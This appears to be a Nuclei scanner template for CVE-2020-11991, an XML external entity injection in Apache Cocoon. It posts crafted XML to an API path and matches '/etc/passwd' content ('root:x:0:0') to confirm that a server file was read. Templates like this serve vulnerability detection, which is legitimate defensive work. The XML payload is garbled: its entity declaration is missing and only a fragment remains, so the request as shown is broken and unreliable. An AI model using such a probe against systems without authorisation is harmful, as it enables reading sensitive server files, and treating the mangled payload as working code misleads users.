id: CVE-2020-11991 info: name: Apache Cocoon 2.1.12 XML Injection author: pikpikcu severity: high tags: cve,cve2020,apache,xml,cocoon description: | When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E requests: - method: POST path: - "{{BaseURL}}/v2/api/product/manger/getInfo" headers: Content-type: "text/xml" body: | ]> John &ent; matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200